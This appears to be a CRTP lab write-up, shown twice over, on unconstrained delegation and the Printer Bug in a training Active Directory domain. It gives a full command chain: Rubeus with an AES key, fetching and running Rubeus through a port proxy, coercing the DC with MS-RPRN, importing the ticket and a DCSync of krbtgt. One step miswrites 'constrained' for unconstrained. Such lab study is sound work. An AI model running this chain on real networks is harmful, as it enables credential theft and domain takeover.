Unconstrained Delegation

A machine with unconstrained delegation caches creds of users connecting to it. To capture it these creds,we use Printer Bug which tricks the user to connect to the machine w Unconstrained Delegation.

Unconstrained Delegation & Printer Bug

What it is: A configuration where a service account can impersonate any user to any service after authentication.
How it works: When a user authenticates to a service (e.g., a web server) with unconstrained delegation, their credentials are cached on that service. This allows the service to request access to other resources on behalf of the user.
Security Risk: If an attacker compromises a service account with unconstrained delegation, they can impersonate any user, including domain admins, to access other services and resources within the domain.

How do we trick a high priv user to authenticate to a machine with Unconstrained Delegation?

Printer Bug:

What it is: An attack that exploits the way Windows handles printer requests, allowing an attacker to coerce a domain controller to authenticate to a machine controlled by the attacker.
How it works:
- An attacker sends a printer request to a domain controller.
- The domain controller responds by authenticating to the attacker-controlled machine using the machine's account credentials.
Security Risk: When combined with unconstrained delegation, this allows the attacker to capture the domain controller’s credentials. With these credentials, they can perform actions as the domain controller, leading to full domain compromise.

Exploitation Flow:

Compromise a machine with unconstrained delegation:
- The attacker identifies and compromises a service account or machine with constrained delegation enabled.
Trigger the Printer Bug:
- The attacker uses the Printer Bug to force a domain controller to authenticate to their controlled machine.
Capture the credentials:
- The domain controller's credentials are cached on the compromised machine due to unconstrained delegation.
Impersonate the domain controller:
- With the captured credentials, the attacker can now impersonate the domain controller and perform actions across the domain.

#Find servers with unconstrained delegation:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name

# Check if any of the servers with unconstrained delegation have local admin access to the machine.

# To do that, first get a new process to find if the user has admin access on the user with unconstrained delegation.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

# If the user has local admin privs, trick high priv user to connect to a machine and exploit using printer bug.
# Copy Loader
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpappsrv\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-appsrv cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

ArgSplit "monitor"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap

# Force auth using MS-RPRN
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

# Rubeus captures the base64 Ticket

# Use PassTheTicket to import ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:adada

# Once ticket is imported, use DCSync to dump secrets
C:\AD\Tools>Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit"

PreviousKerberos Delegation NextCRTP Lab 15

Last updated 11 months ago

Unconstrained Delegation & Printer Bug

What it is: A configuration where a service account can impersonate any user to any service after authentication.

How it works: When a user authenticates to a service (e.g., a web server) with unconstrained delegation, their credentials are cached on that service. This allows the service to request access to other resources on behalf of the user.

Security Risk: If an attacker compromises a service account with unconstrained delegation, they can impersonate any user, including domain admins, to access other services and resources within the domain.

How do we trick a high priv user to authenticate to a machine with Unconstrained Delegation?

Printer Bug:

What it is: An attack that exploits the way Windows handles printer requests, allowing an attacker to coerce a domain controller to authenticate to a machine controlled by the attacker.

How it works:

An attacker sends a printer request to a domain controller.
The domain controller responds by authenticating to the attacker-controlled machine using the machine's account credentials.

Security Risk: When combined with unconstrained delegation, this allows the attacker to capture the domain controller’s credentials. With these credentials, they can perform actions as the domain controller, leading to full domain compromise.

Exploitation Flow:

Compromise a machine with unconstrained delegation:

The attacker identifies and compromises a service account or machine with constrained delegation enabled.

Trigger the Printer Bug:

The attacker uses the Printer Bug to force a domain controller to authenticate to their controlled machine.

Capture the credentials:

The domain controller's credentials are cached on the compromised machine due to unconstrained delegation.

Impersonate the domain controller:

With the captured credentials, the attacker can now impersonate the domain controller and perform actions across the domain.

#Find servers with unconstrained delegation:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\PowerView.ps1

Get-DomainComputer -Unconstrained | select -ExpandProperty name

# Check if any of the servers with unconstrained delegation have local admin access to the machine.

# To do that, first get a new process to find if the user has admin access on the user with unconstrained delegation.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:appadmin /aes256:68f08715061e4d0790e71b1245bf20b023d08822d2df85bff50a0e8136ffe4cb /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local

# If the user has local admin privs, trick high priv user to connect to a machine and exploit using printer bug.
# Copy Loader
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorpappsrv\C$\Users\Public\Loader.exe /Y

winrs -r:dcorp-appsrv cmd

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72

ArgSplit "monitor"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /targetuser:DCORP-DC$ /interval:5 /nowrap

# Force auth using MS-RPRN
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local

# Rubeus captures the base64 Ticket

# Use PassTheTicket to import ticket
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /ticket:adada

# Once ticket is imported, use DCSync to dump secrets
C:\AD\Tools>Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:dcorp\krbtgt" "exit"